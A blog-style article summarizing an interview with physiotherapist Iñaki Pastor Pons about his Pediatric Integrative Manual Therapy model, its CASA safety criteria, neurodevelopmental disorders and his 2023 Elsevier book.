Is he a professor? Is he a researcher?<br\/>When asked how he defines himself, <strong>I\u00f1aki Pastor Pons <\/strong>gives a different answer: he considers himself <strong>a bridge builder.<\/strong>  <br\/><br\/>Bridges between areas that have traditionally worked separately: pediatric physiotherapy, manual therapy, neurodevelopment, oculomotor function, and clinical reasoning. His proposal is not to add techniques, but to integrate perspectives in order to offer a physiotherapy that is more complete, more coherent, and more humane. <\/p>\n\n<h2 class=\"wp-block-heading\">What is PIMT?<\/h2>\n\n<p class=\"wp-block-paragraph\">TMPI stands for Pediatric Integrative Manual Therapy. It is not simply a technique, but a model for understanding pediatric physiotherapy. <br\/>According to Pastor, pediatric physiotherapy has developed in depth the management of major neurological pathologies\u2014cerebral palsy, genetic syndromes, complex conditions\u2014but something fundamental was missing:<br\/><br\/>A physiotherapy for all children.<br\/><br\/>Not only for severe disease, but also for:<br\/><br\/> \u25aa\ufe0f Babies who need support in their development.<br\/> \u25aa\ufe0f Plagiocephaly.<br\/> \u25aa\ufe0f Sports injuries.<br\/> \u25aa\ufe0f Common neuromusculoskeletal difficulties.<br\/> \u25aa\ufe0f Everyday situations of growth.<br\/><br\/>PIMT integrates two areas that have historically been disconnected:<\/p>\n\n<ol class=\"wp-block-list\">\n<li>Manual therapy in pediatrics.<\/li>\n\n\n\n<li>Neurodevelopment physiotherapy.<br\/><br\/>By bringing them together, it not only expands clinical possibilities, but restores meaning and coherence to professional practice.<\/li>\n<\/ol>\n\n<h2 class=\"wp-block-heading\">Why is pediatric manual therapy necessary?<\/h2>\n\n<p class=\"wp-block-paragraph\">Pastor raises a very concrete question:<br\/>In any hospital, a physiotherapist treats children with fractures, immobilizations, torticollis, or sports injuries.<br\/><br\/>So, how is a pediatric joint mobilized?<br\/>Are the same rules applied as in adults?<br\/><br\/>Evidently not.<br\/><br\/>However, pediatric manual therapy continues to be a controversial topic. Part of the problem is that under the same term very different approaches are grouped together (chiropractic, osteopathy, various manipulations), which creates confusion in the scientific literature. <br\/><br\/>For Pastor, the issue is not whether it should exist, but that it is already part of everyday clinical practice. What is lacking is: <br\/><br\/>\u25aa\ufe0f Clear criteria.<br\/>\u25aa\ufe0f Safety.<br\/>\u25aa\ufe0f Specific training.<br\/>\u25aa\ufe0f Conceptual differentiation within physiotherapy.<\/p>\n\n<h2 class=\"wp-block-heading\">The \u201cCASA\u201d criteria of pediatric manual therapy<\/h2>\n\n<p class=\"wp-block-paragraph\">Regardless of the school or approach, Pastor proposes basic criteria:<br\/><br\/>\u25aa\ufe0f <strong>Comfortable<\/strong>: the child can relax; they could even fall asleep.<br\/>\u25aa\ufe0f <strong>Adapted<\/strong>: to their age, characteristics, movement, and to the family.<br\/>\u25aa\ufe0f <strong>Gentle<\/strong>: slow, respectful, minimizing risks.<br\/>\u25aa\ufe0f <strong>Accompanied<\/strong>: the family is part of the process.<br\/><br\/>Safety is the central axis. It is not only about intervening, but about intervening with criteria, sensitivity, and responsibility. <\/p>\n\n<h2 class=\"wp-block-heading\">Neurodevelopmental disorders: a growing reality<\/h2>\n\n<p class=\"wp-block-paragraph\">The current incidence is around 15% of the child population. That is, in many classrooms there are one or two children with this type of difficulty. <\/p>\n\n<p class=\"wp-block-paragraph\">Neurodevelopmental disorders (ADHD, learning disorders, coordination disorders, language disorders, autism spectrum disorder, among others) do not affect only childhood. They extend into adolescence and adulthood, impacting social, work, and family life. <br\/><br\/>Pastor highlights several key points:<br\/><br\/>\u25aa\ufe0f They are not exclusively \u201cmental.\u201d<br\/>\u25aa\ufe0f There is an important subcortical component (balance, vestibular system, basic coordination).<br\/>\u25aa\ufe0f There are relevant prenatal and epigenetic factors.<br\/>\u25aa\ufe0f Prematurity is a significant risk factor.<br\/>\u25aa\ufe0f Diagnoses show a high degree of overlap and comorbidity.<br\/><br\/>For this reason, he proposes going beyond the diagnostic label and understanding <strong>how each child functions within their context.<\/strong><\/p>\n\n<h2 class=\"wp-block-heading\">Integrative intervention: bottom-up and top-down<\/h2>\n\n<p class=\"wp-block-paragraph\">The comprehensive approach combines two complementary pathways:<br\/><br\/>\u25aa\ufe0f <strong>Bottom-up<\/strong>: intervention starting from basic systems (sensory, vestibular, coordination).<br\/>\u25aa\ufe0f <strong>Top-down<\/strong>: work from executive functions, tasks, cognition, and participation.<br\/><br\/>Reducing intervention to a single dimension &#8211; whether purely cognitive or exclusively motor &#8211; limits outcomes.<br\/><br\/>Interdisciplinary work is not a secondary option, but a real necessity. No professional holds the entire perspective. Integration multiplies effectiveness.  <\/p>\n\n<h2 class=\"wp-block-heading\">A unique editorial contribution in physiotherapy<\/h2>\n\n<p class=\"wp-block-paragraph\">In 2023, Elsevier published the book Pediatric Manual Therapy in Neuromusculoskeletal Alterations of the Baby and the Child, coordinated by Pastor together with other health professionals.<br\/><br\/><br\/>Among its distinguishing contributions are:<br\/><br\/><br\/>\u25aa\ufe0f Development of a specific anatomy for the baby and the child (not extrapolated from the adult).<br\/>\u25aa\ufe0f Structural and functional integration.<br\/>\u25aa\ufe0f Clinical reasoning diagrams.<br\/>\u25aa\ufe0f Evaluation and intervention proposals based on health standards.<\/p>\n\n<p class=\"wp-block-paragraph\">In addition, a new manual on neurodevelopmental disorders with an integrative and interdisciplinary approach is being prepared, aiming to respond to the growing clinical demand in this field.<\/p>\n\n<h2 class=\"wp-block-heading\">Final reflection<\/h2>\n\n<p class=\"wp-block-paragraph\">Perhaps the sentence that best summarizes the interview is this:<br\/><br\/>It is not the diagnosis that is treated.
